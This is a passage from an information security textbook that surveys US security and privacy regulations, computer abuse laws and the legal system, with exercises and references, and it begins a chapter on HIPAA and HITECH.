standard defines a maturity model of six levels (0–5), enabling an organization to ascertain where they are and how they can progress to higher maturity levels. Further information on COBIT is also outlined in Chap. 6 Governing. It is widely recognized that SOX adherence is expensive to implement, but has also resulted in fewer cases of business fraud and accounting scandals [10], and for good reason: CEOs who “recklessly” violate certification of the organization’s financial statements face up to 10–20 years of imprisonment, and fines of $1–5 million dollars, with larger amounts for “willful” violations [11].

330

18  Complying with U.S. Security Regulations

18.1.4 Gramm–Leach–Bliley Act (GLB), 1999 This act, also known as the Financial Services Modernization Act, applies to consumer financial transactions. It protects personal financial information, but also allows banks, securities and insurance companies to merge, to allow one-stop-­ shopping for financial needs [3]. Applicability: GLB applies to organizations that significantly engage in financial products or services, including mortgage brokering, credit counseling, property appraisals, tax preparation, credit reporting, and ATM operations with customer knowledge [15]. General Requirements: There are three components to this regulation [3]. The Privacy Rule requires that financial institutions communicate a Notice of Privacy Practices (NPP) to its customers, at first transaction and annually thereafter. This NPP should describe how the organization protects Nonpublic Personal Information (NPI), which includes name, address, and phone numbers when associated with financial data, social security number, financial account numbers, credit card numbers, date of birth, customer relationship information, and details of financial transactions. However, financial companies may share credit reports and credit applications with third parties, unless a customer specifically ‘opts out’ of this disclosure type [3]. The Pretexting Rule outlaws the use of counterfeit documents and social engineering to obtain customer information. It also requires that organizations include security awareness training for employees. Employees should be trained to recognize and report social engineering attempts. The Safeguards Rule requires financial institutions develop an information security program that describes the administrative, technical, or physical controls used to protect personal financial information [3]. This program must include one or more designated employee(s) to coordinate security, a risk assessment program, control over contractors, periodic review of policies, employee training and other personnel security, physical security, data and network security, intrusion detection, and an incident response program [15]. The major problem with GLB was that it applied only to financial institutions, and not to the myriad of retailers that provide credit. Thus, its scope was too limited.

18.1.5 Identity Theft Red Flags Rule, 2007 A follow-up regulation to GLB, the Fair and Accurate Credit Transaction Act of 2003 defined the Identity Theft Red Flags Rule, to further minimize identity theft [3, 16].

18.1  Security Laws Affecting U.S. Organizations

331

Applicability: The Red Flags Rule (RFR) applies to any ‘creditor’, including those who provide credit card accounts, utility accounts, cell phone accounts, and retailers who provide financing. The term ‘creditor’ is a fairly lengthy definition, which (1) applies to those organizations that provide credit or defer payment or bill customers for products and services, and (2) provides funds for repayment, and/or uses credit reports, and/or provides information to credit reporting agencies about consumer credit. General Requirements: These organizations must provide a written ‘Identity Theft Prevention Program’, which addresses for their company how Red Flags should be detected and handled by their employees. Agencies regulating this rule established five categories and many examples of red flag situations (as outlined in Chap. 2 Fraud). The program should include the list of red flags that apply to the organization, as well as how these red flags shall be detected and handled. Employees shall be trained for Red Flags, and contractual agreements must be specified with service providers. The program shall be reviewed periodically, and approved by the organization’s board of directors [3]. The size and complexity of the plan should be commensurate with the organization size. The organization needs to protect ‘covered accounts’, which includes consumer accounts that involve multiple transactions, or other accounts where the risk of identity theft is ‘reasonably foreseeable’, such as Internet or telephone accounts, or where there is a history of identity theft [16]. The FTC and other government agencies enforce the RFR [16].

18.1.6 Family Educational Rights and Privacy Act (FERPA), 1974, and Other Child Protection Laws FERPA protects personally identifiable information (PII) such as name, social security number, and student number [3]. Although not listed as PII, grades are also protected (with some allowances). Students and their guardians at public institutions shall be able to view their records, request corrections to their records, and receive a disclosure notification annually, which tells students of their FERPA rights. Qualifying for these permissions are parents of students younger than 18, students 18 or over, and students attending a school of higher education [18]. Schools may disclose some defined directory information for students, but must enable students to opt out. Information that is not protected by FERPA privacy includes police records, student majors, grade level, honors and awards, dates of attendance, status (full/part-time), participation in officially sponsored sports or clubs. [18]. If a school is found to be in violation of FERPA, e.g., because of repeat offenses, they can lose federal funding. Other student-related regulation includes [3]:

332

18  Complying with U.S. Security Regulations

18.1.6.1 Children’s Online Privacy Protection Act (COPPA), 1998 COPPA protects children’s privacy on the Internet, including their name, contact information, images and identifiers, such as social security number, geolocation and IP address [3]. Children may be distinguished from adults by asking for their age or birthdate, or charging a fee via credit card. The law requires parental consent before collecting personal information for children under 13 years. This parental consent may be collected via credit card, toll-free numbers, signed forms, video conference, or a government-issued identification. The website must also widely advertise a Privacy Policy indicating how data is collected, used, disseminated, and how this data can be purged or modified. The FTC has collected $3 million, $800,000 and $250,000 from three organizations violating COPPA. 18.1.6.2 Children’s Internet Protection Act (CIPA), 2000 Schools and libraries receiving federal funding must filter web content for children under 17 years [3]. Websites to be filtered include pornography, obscene materials, and materials deemed harmful to minors. Filters can be disabled for adults. An Internet Safety Policy must be available to all users. It shall describe appropriate access and restrictions for minors.

18.1.7 Federal Information Security Management Act (FISMA), 2002 The E-Government Act of 2002 was designed to protect government information for the purpose of economic and national security interests, in the wake of September 11, 2001 terrorist attacks. The E-Government Act’s Title III is entitled Federal Information Security Management Act (FISMA). It replaced the less comprehensive Computer Security Act (CSA) of 1987. Both the CSA and FISMA authorized the National Institute for Standards and Technology (NIST) to develop minimum standards. FISMA must be adhered to by federal agencies, their contractors, and other entities whose systems interconnect with U.S. government information systems. FISMA also set in place the US-CERT, which is a national incident response center. This regulation is important, since Federal chief information officer Kundra said in 2010 that government computers are attacked millions of times each day [3]. FISMA adherents must perform risk-based security to  comply with the  NIST Risk Management Framework. The risk analysis determines which controls are recommended.  Recommended controls are listed as Federal Information Processing Standards (FIPS). An overview of security requirements is provided in NIST 800-53, Security and Privacy Controls for Information Systems and Organizations [19]. This document describes requirements for high, moderate and low impact (or

18.1  Security Laws Affecting U.S. Organizations

333

not applicable) information systems. The security category (SC) for each system depends on each information system’s highest rating assigned for either confidentiality, integrity, and/or availability. An example category would be [20]:



 confidentiality,NA  ,  integrity,MODERATE   SC sensor data    ,  availability,HIGH  

The low, moderate and high rating refer to whether the security aspect has a limited, serious or severe/catastrophic impact respectively, on the organization’s operations, assets or persons. The areas that NIST 800-53 addresses include (but are not limited to) [19]: (i) Access control: Access to government information is limited to authorized users, processes and devices; discusses temporary, emergency, group accounts;  includes information flow, segregation of duties, least privilege, remote and wireless access. (ii) Awareness and training: All staff are trained to perform security functions as needed to adhere to law and retain secure systems. (iii) Audit and accountability: System logs are retained and analyzed to enable investigation into wrongdoing, including tracking individual user actions. (iv) Assessment, authorization and monitoring:  Organizations are periodically audited, penetration tested, certified, and must continuously monitor for the effectiveness of security controls. (v) Configuration management: Organizations must maintain an inventory and library system for baseline and evolving information (including documentation, software, hardware, change management). (vi) Contingency planning: Business continuity planning prepares agencies to minimize the impact of availability-related emergency situations. Includes backups, training, testing, alternate sites, telecommunications. (vii) Identification and authentication: Access to government computers is provided only to properly authorized users, devices or processes; includes services, cryptographic module authentication, multifactor, bidirectional, token-based, biometric, PKI. (viii) Incident response: Organizations must prepare or plan to appropriately handle security-related incidents, and document and report on these incidents when they occur. (ix) Maintenance: Information systems shall be properly maintained, and the personnel, tools, techniques and mechanisms, which perform the maintenance, shall be effectively controlled. (x) Media protection: Paper and computerized data must be securely handled and destroyed; includes media marking, access, storage, transport, sanitization, use, downgrading. (xi) Physical and environmental protection: Information systems shall be protected from environmental hazards and physical access by unauthorized

334

18  Complying with U.S. Security Regulations

p­ ersons, and shall be maintained in an environment conducive to proper operation; includes visitors, emergencies, power, fire, water, asset monitoring. (xii) Planning: Organizations shall develop and maintain privacy and  security plans that analyze risk and describe the security controls, including proper use of computer systems by users. (xiii) Program management: Management responsibilities include planning/scheduling, organizing, measuring, architectures, inventory, risk management. (xiv) Personnel security: Organizations ensure that personnel and contractors with access to information systems are trustworthy and comply with regulations; that access is revoked when such personnel is terminated; and that sanctions are applied for misuse. (xv) Personally Identifiable Information processing and transparency: Addresses information privacy through the use of authority, privacy notice, consent.  (xvi) Risk assessment: Periodic risk assessment considers risk affecting the agency’s mission, functions, image, and reputation, and impacting information assets, operations, and individuals. (xvii) Systems and services acquisition: In-house and outsourced software development shall follow a lifecycle with documentation that addresses security, and includes  software development requirements, testing, configuration management, a restricted installation, and use of data. (xviii) System and communications protection: System protection includes methods of system engineering that addresses network security; communications protection  and controls  from network-based attacks includes protecting transmissions at external and key internal boundaries. (xix) System and information integrity: Information technology shall monitor and protect against malware, provide alerts, and correct errors in information, software and firmware in a timely manner. (xx) Supply chain risk management: Secure processes related to supply chains includes risk management, supply chain controls and processes, component authenticity and disposal. The NIST Federal Information Processing Standards and Special Publications (guidelines) are freely available for access and provide an excellent foundation for any security solution.

18.1.8 California Consumer Privacy Act (CCPA) This data privacy regulation went into effect August 14, 2020, and was amended March 15, 2021, to protect residents of California [23, 25]. This landmark legislation (at least for the U.S.) was (at time of writing) the only generalized privacy regulation in the nation. It is meant to provide privacy to consumers in the collection and sale of their information, by enabling them to opt out of the sale of their information.

18.1  Security Laws Affecting U.S. Organizations

335

Applicability: Personal information in all forms, whether electronic or not, are protected for California residents, while in California. This is true, regardless of where the business operates. When multiple laws may be applicable, the law that provides the strongest consumer protection prevails. This state law supersedes lower level laws (e.g., city, municipal) [24]. General Requirements: This regulation is best read in combination with the Information Privacy chapter. Rights provided by the CCPA include (defined further within Chapter 10) [24]: • Right to Know (1798.100): This right ensures that at or before the time of information collection, consumers are told what information is collected about them. It also ensures that consumers may request information to learn the types and specific information held about them. If an organization does not store or sell information, but uses it only one time for transactional purposes, then this does not apply. • Information that the consumer can obtain, is further spelled out in Request to Know – General and Sales (1798.110, 1798.115). In addition to the types and specific information collected, they can learn the source(s) and purpose(s) of the information collected. Related to information sold, consumers may learn the categories of information buyers and the types of information sold to each. Third party buyers shall not be able to resell this information without explicit consumer consent. • Consumers shall be informed of their right to this information. • Right to Deletion (1798.105): A consumer may request that their personal information be deleted and the business shall comply, except under special conditions. Conditions where the business need not comply include when: a transaction is underway; a processing error is being corrected; a crime is being investigated or legal actions are underway; to retain free speech privileges; for approved research or public statistics collection; or internal-only uses of the freely offered information. • Right to Opt-Out of Sales (1798.120): Businesses shall inform consumers that their information may be sold, and provide them with the ability to opt out of this sale. When consumers opt out of their information being sold, their information shall not be sold until they provide explicit permission to do so. • Concerning the sale of information on children, organizations must obtain parental permission to sell any personal information for children less than 13 years old, and must provide children between 13 and 15 the chance to opt-in to such sales (as opposed to opting out). • This right was amended in 2021 to describe the opt-out procedure (999.306) [25]. There should be at least two methods to opt out, including a “Do Not Sell My Personal Information” on the home webpage or landing page of a mobile application. Alternative methods of opting out may include a toll-free phone number, email address, submitted form, etc. The opt-out text must be in plain

336









18  Complying with U.S. Security Regulations

English, readable to those with disabilities and providable in alternative languages, if those languages are used elsewhere for other purposes. Right to Nondiscrimination (1798.125): Consumers shall not suffer discrimination based on their option to not have their information sold. It is possible for an organization to sell or provide a product or service at higher value, if the higher value is commensurate for the sale of the personal information, with the final caveat that: “A business shall not use financial incentive practices that are unjust, unreasonable, coercive, or usurious in nature.” (1798.125 bullet b.4) Private Right of Action (1798.150): Consumers are responsible for notifying a business of any privacy violation, and allowing the organization to respond within 30 days. If the issue(s) are not rectified, a single person or a class of consumers may sue. Consumers are entitled to recover damages via civil suit between $100 and $750 each, per incident, or they can sue for actual damages. In considering damages, courts may consider the nature, duration and number of violations, and the financial worth and willfulness of misconduct of the defendant. Likewise, businesses are liable for civil penalty from the state of California. The state also must give 30 days’ notice to correct the noncompliance. Penalties may total $2500 per violation or $7500 per willful violation.

18.2 Computer Abuse Laws These laws are meant to protect organizations from attackers. A person can be charged with a misdemeanor or more serious felony crime. Misdemeanor crimes are generally punishable for less than one year in prison, while felony convictions earn one year or more [3]. Both convictions can also result in fines. The Computer Fraud and Abuse Act (CFAA) of 1984 protects against traditional cracking. The USA Patriot Act of 2001 amended the CFAA by lowered damage thresholds and increasing penalties. The current CFAA protects against trespassing on a Government, financial institution or other ‘protected’ computer, which is any computer that participates in interstate or foreign commerce or communications [22]. Misdemeanor crimes include negligent damage, trafficking in passwords, and unauthorized access or access in excess of authorization. It is generally viewed that insiders may ‘exceed authorization’ (unless clearly documented) while outsiders are ‘without authorization’. Felony crimes include obtaining or damaging information valued at or exceeding $5000; or damage to ten or more computers; or a threat to public health or safety, justice, national security, or physical injury; or if the crime includes fraud, extortion, recklessness or criminal intent [3, 26]. Penalties include fines and from one to ten years in prison, except a maximum penalty of 20 years applies in cases of obtaining national security information

18.3  Other Laws

337

and/or repeat cases of intentional or reckless damage [26]; with potential life in prison for reckless attempt to, or causing, death. The Wiretap Act, amended 1986: Covers electronic communications. This law was used to prosecute President Nixon’s Watergate burglers [26]. This law covers interception and/or disclosure and/or use of intercepted communications, including cloning emails, spyware, and use of protocol sniffers. The offense must be intentional. A defense stipulates that the recorded party(s) must consent to recording. This felony incurs penalties of $250,000 (individual) to $500,000 (organizations) and a maximum 5-year prison sentence. The Electronic Communication Privacy Act (ECPA), 1986: Disallows eavesdropping of network (felony) and stored data (misdemeanor). The USA PATRIOT Act of 2001 amended ECPA by allowing the government to intercept electronic communications for national security reasons, by requiring a low level of justification [3]. It also enables service providers to request help from law enforcement or government agencies to capture communications of intruders. Finally, it enables service providers to release communications to law enforcement if they suspect crimes or danger to life. Any such freely provided communications, obtained without warrant, may then be used as evidence in court.

18.3 Other Laws Other laws addressing specific areas related to security but outside the scope of this text include [3, 22, 26]: • Unlawful Access to Stored Communications, 1986: Protects email and voice mail from unauthorized access. Misdemeanor or felony. • Wire Fraud, 1952, with updates to 2008: Using communications (including by wire, radio or television) to perpetrate fraud. Penalties of defrauding a financial institution can reach to $1 million and/or 30 years imprisonment. • Child Protection and Obscenity Enforcement Act, 1988: Prohibits known possession of any printed, video, or digital file containing child pornography, which is transported across state lines. • Identity Theft and Assumption Deterrence Act, 1998: Identity theft protects the transfer and use of personally identifiable information, including name, social security number, birth date, government ID/numbers, biometric data, telecommunications ID, routing codes, etc. Violations can result in fines and 5–15 years in prison. This was amended by Identity Theft Penalty Enhancement Act, 2004, specifically prosecuting computer criminals selling payment card information, through hacking or phishing. In addition to prison time, fines can compensate victims for the time and expenses spent rectifying the damage caused. An Access Device Fraud law similarly can address such crimes, where Access refers to account access using devices, such as counterfeit devices.

338

18  Complying with U.S. Security Regulations

• Anti-Cybersquatting Consumer Protection Act, 1999: Entities may sue cybersquatters, who acquire a domain name which is a registered trademark or trade name for another organization. • Controlling the Assault of Non-Solicited Pornography and Marketing (CAN-SPAM), 2003: Commercial e-mailers must follow specific requirements, such as using clear subject lines, accurate headers, and clear source identifiers and describing how the recipient can opt out of future emails. • International Traffic in Arms Regulations (ITAR), Export Administration Regulations (EAR) and Regulations from the Office of Foreign Asset Control (OFAC): These laws prohibit export of certain technologies and information overseas, without a license (if export is allowed at all). • Patent Act, 1952; Trademark Act, 1946; Copyright Act, 1976; Digital Millennium Copyright Act, 1998; Economic Espionage Act, 1996, 2012: These all deal with patents, copyright and trademarks. • Americans with Disabilities Act (ADA) 1990 [27]: This civil rights law prohibits discrimination for people with disabilities. It applies to state and local governments, public and commercial facilities, including restaurants, schools, doctors’ offices, transportation, factories, office buildings (including security positions.) Disabilities include hearing, vision, illness, injury, physical abilities, depression, etc. “Architectural barriers” provide limited accessibility to parts of a building (e.g., stairs) for persons with disabilities. Expected changes evaluate “readily achievable,” which considers the level of changes required and their affordability to the organization. “Program access” applies to state and local governments to ensure that persons with disabilities are not limited from any “program, service or activity”. The Rehabilitation Act applies the same rules to federal agencies, with its Section 508 mandating making federal information and communication technology accessible.

18.4 Final Considerations In the United States, Obama issued an Executive Order requesting that the government share with industry its knowledge of cybersecurity attacks and prevention [6]. NIST is developing a best practices framework on cybersecurity that is voluntary. If your organization adheres to the law and these policies and a data breach occurs, your organization will have a defense. Some competing organizations in the same industry may meet to collaborate on security defense. They share known attacks in order to better defend their proprietary information against state-sponsored spying. While this may be a good idea, it is important to discuss with legal counsel how this can be established and executed while avoiding charges of anti-competitive behavior.

18.5  Advanced: Understanding the Context of Law

339

18.5 Advanced: Understanding the Context of Law Because information security incidents often involve criminals, this book discusses security regulation in a few Advanced sections of the book. In this chapter, understanding the types and jurisdictions of law is useful if you ever consider going to court. Three sources of law in the United States include [3]: Criminal Law: The prosecution of parties charged with crimes against public order, as specified in the federal and state criminal codes. The evidence must show “beyond a reasonable doubt” that the defendant is guilty. This means that there can be no reasonable doubt in the mind of a reasonable judge or juror, but not that they are 100% sure. Civil Law: A person, organization or government who has been harmed can ask for redress from the party who inflicted harm. These cases can be based on regulation or common law. Common law follows the general principles and body of traditional or precedent judicial cases that the United States inherited from England. To decide a case, there must be a “preponderance of the evidence”, which assumes that it is more probable than not (>50%) that the wrong action occurred. Some civil cases require a higher “clear and convincing evidence” to convince the court that the wrong action was likely to occur. Administrative Rules: Federal and state governments can delegate responsibility to agencies to create and enforce rules and/or judge cases. There must be a process to ensure fairness. Cases may be reviewed by a federal court. The preponderance of evidence must be at the lowest “not arbitrary or capricious” level, which means that the facts of the case should reasonable correspond to the administrative decision. One such agency making decisions in the security realm is the Federal Trade Commission (FTC). The Federal Trade Commission Act gives the FTC permission to define specific rules for “acts or practices which are unfair or deceptive acts or practices in or affecting commerce” and also sanction violators. Five different levels of regulation, ordered from highest and most powerful to the less powerful are described below. Lower levels of regulation must conform to all higher levels. They include [3]: 1. U.S. Constitution: Defines the structure of the federal government and its relationship with the states. It also includes the bill of rights, outlining personal freedoms. 2. Federal Laws: These laws passed by Congress are maintained in the U.S. Code. The constitution allows Congress to regulate commerce between the states, as well as to declare war, print money, and maintain the post office and armed forces. Federal District Courts can hear cases relating to the constitution or federal laws, and cases between residents of different states summing to losses over $75,000. The Circuit Court of Appeals and Supreme Courts handle appeals of federal cases. The Supreme Court can also hear cases between different state

18  Complying with U.S. Security Regulations

340

governments and perform judicial reviews when state or federal laws may violate the Constitution. 3. State Constitution: Describes the structure of the state government and relationship between the state and its citizens. It defines an additional set of personal rights on a state-by-state basis. 4. State Laws: State governments may pass laws affecting state residents. State courts generally include a Trial Court, State Court of Appeal and State Supreme Court. State courts may address cases of state or federal law, but must always apply the hierarchy of laws and consider Supreme Court decisions as precedent. With the long reach of the Internet, crimes may be instigated from outside the state, but can be prosecuted within the state if the crime occurred within state boundaries. 5. Common Law: Case tradition provides precedent when regulations do not explicitly address a situation. The Internet not only spans states, it also spans nations. This causes additional jurisdiction problems when crimes occur across borders. To counter such crimes and promote cooperation in investigations and prosecution, 53 nations signed a Convention on Cybercrime [3]. This agreement requires members to prohibit certain cyber-crimes and copyright infringement. Forty-two nations, including the U.S., have ratified the treaty.

18.6 Questions and Problems 1. Vocabulary. Match each regulation or standard with its applicable area of coverage. HIPAA FERPA CCPA

FISMA PCI DSS

Sarbanes–Oxley Gramm–Leach–Bliley

State breach notification Identity theft red flags rule

(a) Addresses the privacy and security of health information. (b) Standard required by payment card companies, to ensure security of payment card information, through audits and network scans. (c) Addresses privacy of identity information, including social security numbers, financial information, state/driver’s license information, and possibly other information. (d) Secures student information. (e) Secures information within federal government agencies. (f) Addresses financial statement fraud in corporations. (g) Addresses privacy and security of financial information, including ensuring employees recognize and report social engineering attempts.

18.6  Questions and Problems

341

(h) Organizations reporting or providing credit or credit information must protect customers from social engineering scams. (i) California privacy law that protects consumers and their right to not have their information sold. 2. State Breach Notification Law. Read the law that applies to your state or territory. What are the basic tenets required? For a reference on the regulation, see: https:// www.ncsl.org/research/telecommunications-­a nd-­i nformation-­t echnology/ security-­breach-­notification-­laws.aspx. 3. Audit: Local State Breach. Your local business does business primarily in one state, with no online sales. Prepare an Audit Engagement Plan to ensure that your organization adheres to its state breach notification law. Consider not only verifying documented policy, but also implementation. An example Audit Engagement Plan is provided in Table 15.2. 4. Audit: California Consumer Privacy Act. Your large business operates primarily through online sales, with 20% of sales from California. Prepare an Audit Engagement Plan to ensure that your organization adheres to the California privacy law. Consider not only verifying documented policy, but also implementation. An example Audit Engagement Plan is provided in Table 15.2. 5. Evidence Requirements. Match the type of evidence required with each type of case: administrative, civil, criminal. Then number each evidence level according to the level of certainty required by the jurors to convict, with the most certain as your number 1 selection. (a) Clear and convincing evidence (b) Not arbitrary or capricious (c) Preponderance of the evidence (d) Beyond a reasonable doubt 6. Broken Laws Case. A criminal cyber team sends a phishing email with a whitepaper link to a banker at First National Bank. The banker follows the link to the infected web site and unknowingly downloads spyware and a rootkit. The spyware monitors login-password credentials into the company database containing customer information. The criminal team exfiltrates customer financial information, but an Intrusion Prevention System recognizes the data transmission and halts it midway. The security team investigates to find the malware, spending hours with logs, investigating computer work stations, and monitoring transmissions. What laws were broken? What could the criminal team be charged with, if they could be pinned down? 7. Industry-Specific Regulation and Standards. For your selected industry/major/ specialty, list which regulations and standards your industry definitely and may need to adhere to. Example industries you may select from include: health, manufacturing, finance, retail, entertainment, education, hotel, computer manufacturing, software development, or others. How would this law apply to your industry and why?

342

18  Complying with U.S. Security Regulations

8. Legal Analysis. Your organization does online sales in the U.S. How would you plan to adhere to the state breach notification law? How might you address 50 different sets of laws? What arguments might be compelling that you adhere to state breach notification law? 9. Non-IT Aspects of Regulation and Standards. Consider one of the following American security regulations or standards: HIPAA, Gramm–Leach–Bliley, Sarbanes–Oxley, CCPA, or FISMA. What non-IT requirements do they impose that would not be addressed by this text? Some websites provide government- or standards-based information, and thus are authentic sources of information. Consider the sites listed below. If specific links do not work, search the main site using the name of the regulation. Note to instructor: Providing some of the documentation within the course’s learning management system may be helpful. (a) HIPAA/HITECH: Chap. 19 of this text or www.hhs.gov (Health and Human Services) and search for HIPAA. (b) Gramm–Leach–Bliley and Red Flags Rule: Federal Trade Commission: http://www.business.ftc.gov/privacy-­and-­security (c) Sarbanes–Oxley: www.isaca.org (Organizations for standards/security) Your instructor may provide ‘Information Security Student Book: Using COBIT®5 for Information Security’, available at www.isaca.org. Additional information is at www.sans.org, search for ‘COBIT’. (d) FISMA: www.nist.gov (National Institute for Standards and Technology) and search for FISMA.  Specific link: https://csrc.nist.gov/Projects/risk-­ management/fisma-­background. Access FIPS Publication 200 first. (e) California Consumer Privacy Act: https://oag.ca.gov/privacy/ccpa/regs.

References 1. Perlroth N (2014) Online security experts link more breaches to Russian government. New York Times, 28 October 2014 2. Johnson J, Lincke SJ, Imhof R, Lim C (2014) A comparison of international information security regulation. Interdiscip J Inf Know Manag 9:89–116 3. Grama JL (2015) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington, pp 38–48, 68–270, 350–383 4. Connors TJ (2010) States add more criteria to breach notification laws. Manag Healthc Exec 20(11):10 5. National Conference of State Legislatures (2022) State security breach notification laws. http:// www.ncsl.org/issues-­research/telecom/security-­breach-­notification-­laws.aspx. Accessed 2 Aug 2022 6. Thompson L (2013) Privacy: the tidal waves of the future. In: ISACA chapter meeting, Rosemont, 13 Dec 2013 7. Kempfert AE, Reed BD (2011) Health care reform in the United States: HITECH act and HIPAA privacy, security, and enforcement issues. FDCC Q 61:240–273 8. Dalgleish C (2009) Course: HIPAA compliance. Triton College, River Grove 9. Dowell MA (2012) HIPAA privacy and security HITECH act enforcement actions begin. Employee Benefit Plan Rev 2012:9–11

References

343

10. Hoggins-Blake R (2009) Dissertation: examining non-profit post-secondary institutions’ voluntary compliance with the Sarbanes–Oxley Act. ProQuest dissertations and theses, January 2009, pp 1–51 11. Yallapragada RR, Roe CW, Toma AG (2010) Sarbanes–Oxley Act of 2002 and non-profit organizations. J Bus Econ Res 8(2):89–93 12. Narain LS (2009) Implications of the Sarbanes–Oxley Act for nonprofit organizations. Bus Rev (Camb) 13(2):16–22 13. Ramos MJ (2008) How to comply with Sarbanes–Oxley section 404: assessing the effectiveness of internal control. Wiley, Hoboken, pp 1–23, 228–229 14. ISACA (2012) COBIT 5: enabling processes. ISACA, Arlington Heights 15. Federal Trade Commission (2006) Financial institutions and customer information: complying with the safeguards rule. http://www.business.ftc.gov/documents/bus54-­financial-­institutions-­ and-­customer-­information-­complying-­safeguards-­rule. Accessed 15 Nov 2013 16. Federal Trade Commission (2013) Fighting identity theft with the red flags rule: A how-to guide for business, May 2013. https://www.ftc.gov/business-­guidance/resources/fighting-­ identity-­theft-­red-­flags-­rule-­how-­guide-­business. Accessed 22 Oct 2022 17. FTC (2013) Fighting identity theft with the red flags rule: a how-to guide for business. Federal Trade Commission. http://business.ftc.gov/documents/bus23-­fighting-­identity-­theft-­red-­flags-­ rule-how-guide-business. Accessed 15 May 2013 18. Carlson CS (2012) Navigate the FERPA nuisance. Quill 100(2):31 19. NIST (2020) NIST Special Publication 800–53: Security and Privacy Controls for Information Systems and Organizations, rev. 5. National Institute of Standards and Technology, U.S. Dept of Commerce. https://doi.org/10.6028/NIST.SP.800-53r5 20. NIST (2006) Minimum security requirements for federal information and information systems. FIPS Pub. 200. National Institute of Standards and Technology, March 2006 21. Common Criteria (2012) Common criteria for information technology security evaluation: part 1: introduction and general model, vers 3.1, rev 4, September 2012 22. Bragg R, Rohodes-Ousley M, Stasberg K (2004) Network security: the complete reference. McGraw-Hill/Osborne, New York, pp 762–768 23. California Attorney General (2021) Chapter 20. California consumer privacy act regulations: Final regulation text: title 11. State of California Department of Justice. https://oag.ca.gov/ sites/all/files/agweb/pdfs/privacy/ccpa-­add-­adm.pdf 24. Cooley (2018) California Consumer Privacy Act of 2018 – full text. https://cdp.cooley.com/ ccpa-­2018/#section-­1798-­175 25. Bonta R (2022) CCPA regulations. State of California Dept. of Justice, Office of the Attorney General. https://oag.ca.gov/privacy/ccpa/regs 26. Jarrett HM, Bailie MW, Hagen E, Eltringham S (eds) (n.d.) Prosecuting computer crimes, Office of Legal Education, Computer Crime and Intellectual Property Section, Criminal Division, USA. https://www.justice.gov/criminal/file/442156/download 27. ADA (2023) The Americans with Disabilities Act (ADA) protects people with disabilities from discrimination. U.S. Dept. of Justice, Civil Rights Division. https://www.ada.gov/

Chapter 19

Complying with HIPAA and HITECH

Health care organizations should take note that there are now 38 enforcement actions in our Right of Access Initiative and understand that OCR is serious about upholding the law and peoples’ fundamental right to timely access to their medical records. – Office for Civil Rights (OCR) Director Lisa J. Pino, July 15, 2022 [1]

The Health Insurance Portability & Accountability Act (HIPAA) of 1996 was a bipartisan bill introduced by Senators Edward Kennedy and Nancy Kassebaum, and implemented as part of United States law. HIPAA addressed group health insurance, tax/financial aspects, transaction standardization and security. Its Title II regulated the protection of personal health information, in addition to initiating standardization to achieve medical transaction uniformity. Later in 2009, the Health Information Technology for Economic and Clinical Health (HITECH) Act fixed implementation problems with HIPAA. Important security related sections of these U.S. covered by this chapter include: the HIPAA Privacy Rule, Security Rule, and HITECH. • HIPAA Privacy Rule: protects health information whether or not it is computerized. • HIPAA Security Rule: applies to computerized health information. • HITECH Act: updates HIPAA to strengthen penalties, protect patients who had been harmed, require breach notification, and ensure compliance by both health care providers and contractors performing healthcare-related work for them [2]. • Genetic Information Nondiscrimination Act (2008): Protects against genetic testing discrimination, including limiting use by insurance companies in determining eligibility or pricing patient premiums, and preventing employers from using genetic testing in hiring, promotion or firing.

19.1 Background HIPAA and HITECH were implemented because: 1. Employers and other organizations were regularly using health information in hiring, promoting, and laying off employees. Example abuses include [3]: • A woman was fired from job after a positive review but expensive illness © The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_19

345

346

19  Complying with HIPAA and HITECH

• 35% of Fortune 500 companies admitted checking medical records before hiring or promoting • A Midwest banker and county health board member matched customer accounts with patient information. He called due to the mortgages of anyone suffering from cancer. 2. Health organizations and their contractors were inappropriately accessing health information, for advertising and other purposes. • A patient at Brigham and Women’s Hospital in Boston learned that employees had accessed her medical record more than 200 times [3]. • The 13-year-old daughter of a hospital employee took a list of patients’ names and phone numbers from the hospital when visiting her mother at work. As a joke, she contacted patients and told them they were diagnosed with HIV. 3. Health organizations and their contractors were negligent in safeguarding patient privacy, resulting in massive breaches. For example: • In 2006, a desk clerk at a Florida clinic stole the health info of over 1000 patients. The clerk sold the data to a thief, who used the information to submit $2.8 million in fraudulent Medicare claims to the U.S. government. • Eli Lilly and Co. accidentally revealed over 600 patient e-mail addresses, when it sent a message without blind copy, to every person registered to receive reminders about taking Prozac [3]. • In 2006, CVS pharmacies were caught throwing away unredacted pill bottles, medical instruction sheets, and pharmacy receipts. These contained patient names, addresses, prescriptions names, physician names, health insurance numbers and credit card numbers [4]. • In 2009, Blue Cross Blue Shield in Tennessee had 57 hard disks stolen, releasing medical information and social security numbers for over one million people [5]. 4. People avoid using health insurance when they fear their illness may adversely affect their career or health insurance availability. • Diseases such as cancer, AIDS, sexually transmitted disease, substance abuse and mental illness have not been reported by some patients [3]. Another problem with health care is Medical Identity Theft. In this form of identity theft, a person’s name and parts of their medical identity (often, insurance) are stolen by persons without medical insurance to obtain medical services, prescriptions, and other medical supplies. This identity theft may be for prescriptions or operations – or to sell or use addictive prescription drugs – or for faked charges to Medicare for financial reimbursement. For the victim whose ID is stolen, this can lead to inaccurate medical records, since recent treatment notes relate to the thief, not the victim [6, 11, 12]. This incorrect information can become life-threatening when a doctor misdiagnoses or treats the victim using the thief’s medical history. In addition, the thief may leave unpaid medical charges, forwarded to a different

19.2  Introduction and Vocabulary

347

address, and leaving the victim with a degraded credit report. Alternatively, the thief may claim the victim’s health as their own when submitting health information to third parties. Finally, there are few protections for consumers. Doctors’ identifications are stolen to submit fake Medicare transactions [6]. There is demand for medical health records: a medical identity on the black market may be worth $50, compared to $1 for credit card numbers in bulk [12]. An incentive for health organizations to take HIPAA seriously is a Health and Human Services (HHS) website that lists organizations that have suffered health information breaches. The website is known as “The Wall of Shame”. In addition, IBM Security’s Cost of a Data Breach Report indicates that healthcare industry has reported the highest average cost per breach for every year between 2010 and 2022 [10] and in 2022 surpassed $10 million/breach.

